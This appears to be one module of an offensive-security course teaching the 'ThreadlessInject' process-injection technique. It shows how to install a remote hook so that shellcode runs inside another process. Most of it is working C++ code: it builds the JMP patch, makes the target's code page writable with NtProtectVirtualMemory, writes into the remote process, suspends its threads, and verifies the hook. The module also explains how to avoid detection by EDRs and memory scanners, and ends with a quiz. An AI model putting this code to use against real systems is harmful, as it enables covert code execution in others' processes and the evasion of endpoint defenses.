Difficulty: Intermediate

Module 6: Installing the Remote Hook

The moment of truth: overwriting the target function's prologue to redirect execution.

The Final Step Before Execution

At this point, the shellcode and hook stub are sitting in executable memory inside the target process, waiting to be called. The only remaining step is to overwrite the first 14 bytes of the target function with a JMP instruction that redirects to our hook stub. This is the most dangerous operation in the entire chain: you are modifying executable code in a running process. If another thread is executing those bytes at the moment you overwrite them, the process crashes.

Constructing the Hook Jump

The hook is a 14-byte absolute jump that redirects execution from the target function's entry point to the hook stub in our allocated memory region:

C++// Build the 14-byte absolute JMP that will overwrite the function prologue
BYTE hookJmp[14];

// JMP [RIP+0] - opcode FF 25, with 00000000 as RIP-relative offset
hookJmp[0] = 0xFF;
hookJmp[1] = 0x25;
*(DWORD*)(hookJmp + 2) = 0x00000000;  // Offset 0: address follows immediately

// The 8-byte absolute address of our hook stub in the remote process
*(UINT64*)(hookJmp + 6) = (UINT64)remoteHookStubAddr;

// hookJmp now contains:
// FF 25 00 00 00 00 [8 bytes: address of hook stub]
// When executed, the CPU reads the 8 bytes after the JMP instruction
// and loads them into RIP, transferring control to our hook stub

Making the Target Function Writable

Code pages in a running process are typically mapped as PAGE_EXECUTE_READ (RX). You cannot write to them without first changing the page protection. This requires NtProtectVirtualMemory on the remote process:

C++// Step 1: Change the target function's page protection to RWX temporarily
PVOID protectAddr = (PVOID)hookedFuncAddr;
SIZE_T protectSize = 14;  // We only need to write 14 bytes
ULONG oldProtect = 0;

NTSTATUS status = NtProtectVirtualMemory(
    hProcess,
    &protectAddr,
    &protectSize,
    PAGE_EXECUTE_READWRITE,  // Temporarily make writable + executable
    &oldProtect              // Save old protection (should be PAGE_EXECUTE_READ)
);

// Step 2: Write the 14-byte hook JMP over the function prologue
SIZE_T written = 0;
NtWriteVirtualMemory(
    hProcess,
    (PVOID)hookedFuncAddr,   // Destination: start of target function
    hookJmp,                  // Source: our 14-byte JMP
    14,                       // Size: exactly 14 bytes
    &written
);

// Step 3: Restore original page protection
NtProtectVirtualMemory(
    hProcess,
    &protectAddr,
    &protectSize,
    oldProtect,              // Restore to original protection (RX)
    &oldProtect
);

The RWX Window

Notice that for a brief moment, the target function's code page has PAGE_EXECUTE_READWRITE protection. This is a transient state — the protection is changed, the 14 bytes are written, and the protection is immediately restored. A memory scanner running at exactly the right moment could detect this temporary RWX state, but in practice the window is microseconds long. ThreadlessInject minimizes this window by performing the write as quickly as possible.

Thread Safety During Hook Installation

The most dangerous race condition in any hooking technique is the moment of overwriting the target bytes. If a thread in the target process is executing the function at the exact instruction that you are overwriting, the thread will execute a partially-overwritten instruction and crash. Consider what happens step by step:

Race Condition: Partial Hook Write

Time T0: Original bytes are [48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 ...]
Time T1: Thread A's RIP is at byte 3 (mid-instruction). Writer begins overwriting.
Time T2: Bytes are now [FF 25 00 00 00 00 XX XX XX XX 48 89 74 24 18 ...] — partially written
Time T3: Thread A advances to byte 6, hits garbage opcode XX XX — CRASH

There are several strategies to mitigate this risk:

Strategy 1: Atomic 8-Byte Writes

On x86-64 processors, aligned 8-byte writes are guaranteed to be atomic. Unfortunately, our 14-byte hook exceeds this limit. However, you can split the approach: if you can fit a 5-byte relative JMP (E9 xx xx xx xx) that reaches a nearby trampoline, you only need to overwrite 5 bytes, and with careful alignment, the critical first 8 bytes can be written atomically using an interlocked operation.

C++// Atomic write strategy using InterlockedCompareExchange64
// This only works if your detour is within +/- 2GB (relative JMP range)
// and you can fit the patch in 8 bytes

// Build an 8-byte patch: 5-byte relative JMP + 3 bytes of NOPs
BYTE patch[8] = {0};
INT32 relOffset = (INT32)((INT64)hookStubAddr - (INT64)(hookedFuncAddr + 5));
patch[0] = 0xE9;                          // JMP rel32
*(INT32*)(patch + 1) = relOffset;         // 32-bit relative offset
patch[5] = 0x90; patch[6] = 0x90; patch[7] = 0x90;  // NOP padding

// Atomic 8-byte write (in-process example; remote requires different approach)
InterlockedCompareExchange64(
    (volatile LONG64*)hookedFuncAddr,
    *(LONG64*)patch,                      // New value (our JMP + NOPs)
    *(LONG64*)hookedFuncAddr              // Expected current value
);

ThreadlessInject's Approach

In practice, ThreadlessInject uses the simpler NtWriteVirtualMemory approach for the full 14-byte overwrite. The rationale is that thread safety concerns are mitigated by choosing a target function that is not being actively executed at the moment of hook installation. If the function is one that threads call periodically (like a sleep or wait function), there is typically a window between calls where no thread is executing the prologue. The risk is accepted as low for well-chosen targets.

Strategy 2: Suspend/Resume Target Threads

A more robust (but noisier) approach is to suspend all threads in the target process before installing the hook, then resume them after:

C++// Suspend all threads in target process before hook installation
// WARNING: This is detectable and can cause deadlocks
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
THREADENTRY32 te32;
te32.dwSize = sizeof(THREADENTRY32);

std::vector<HANDLE> threads;
if (Thread32First(hSnap, &te32)) {
    do {
        if (te32.th32OwnerProcessID == targetPid) {
            HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME, FALSE, te32.th32ThreadID);
            if (hThread) {
                SuspendThread(hThread);
                threads.push_back(hThread);
            }
        }
    } while (Thread32Next(hSnap, &te32));
}

// Install the hook (safe now, all threads are suspended)
InstallHookJmp(hProcess, hookedFuncAddr, hookJmp);

// Resume all threads
for (HANDLE h : threads) {
    ResumeThread(h);
    CloseHandle(h);
}

However, suspending threads is itself detectable (EDRs monitor SuspendThread calls targeting other processes) and can cause deadlocks if a suspended thread holds a lock that other code needs. ThreadlessInject avoids this approach in favor of the simpler non-atomic write with careful target selection.

Verifying Hook Installation

After writing the hook, a prudent implementation verifies that the write succeeded by reading back the bytes:

C++// Verify the hook was installed correctly
BYTE verification[14] = {0};
NtReadVirtualMemory(hProcess, (PVOID)hookedFuncAddr, verification, 14, NULL);

// Compare with expected hook bytes
if (memcmp(verification, hookJmp, 14) != 0) {
    // Hook installation failed - another thread may have modified the bytes
    // or an EDR may have blocked the write
    printf("[-] Hook verification failed!\n");
    // Cleanup: free remote memory, close handles
    return FALSE;
}
printf("[+] Hook installed successfully at 0x%p\n", (void*)hookedFuncAddr);

The Complete Installation Sequence

Putting it all together, here is the full sequence of operations for hook installation:

Hook Installation Timeline

1. Change target page protection: RX → RWX
2. Write 14-byte JMP over function prologue (NtWriteVirtualMemory)
3. Restore target page protection: RWX → RX
4. Verify hook bytes (NtReadVirtualMemory)
5. Hook is live — next call to target function triggers shellcode

What Happens Next

At this point, the hook is installed. The target function's first 14 bytes are now a JMP to your hook stub. The next time any thread in the target process calls that function, execution will transfer to the hook stub, which will save registers, call the shellcode, restore registers, execute the original prologue bytes, and jump back to the function. From the injector's perspective, the job is done — you can close the process handle and exit. The shellcode will execute asynchronously whenever a target thread calls the hooked function.

Pop Quiz: Installing the Remote Hook

Q1: Why must you change the target function's page protection before writing the hook?

DLL code sections (.text) are mapped with PAGE_EXECUTE_READ protection. This means the memory can be read and executed, but not written to. NtWriteVirtualMemory to this region would fail with STATUS_ACCESS_VIOLATION unless you first change the protection to include write access.

Q2: Why does ThreadlessInject avoid suspending all threads before hook installation?

SuspendThread targeting threads in another process is monitored by EDRs and requires THREAD_SUSPEND_RESUME access, which adds to the detection surface. Additionally, if a suspended thread holds a critical section or mutex, other threads (or the entire process) may deadlock when they try to acquire that lock.

Q3: What is the advantage of a 5-byte relative JMP (E9) over the 14-byte absolute JMP (FF 25)?

A 5-byte relative JMP overwrites fewer instructions, reducing the chance of a thread being mid-instruction during the overwrite. More importantly, the 5-byte patch (plus 3 NOP bytes) fits in 8 bytes, which can be written atomically with an interlocked compare-exchange on x64 CPUs. The downside is the +/- 2GB range limitation.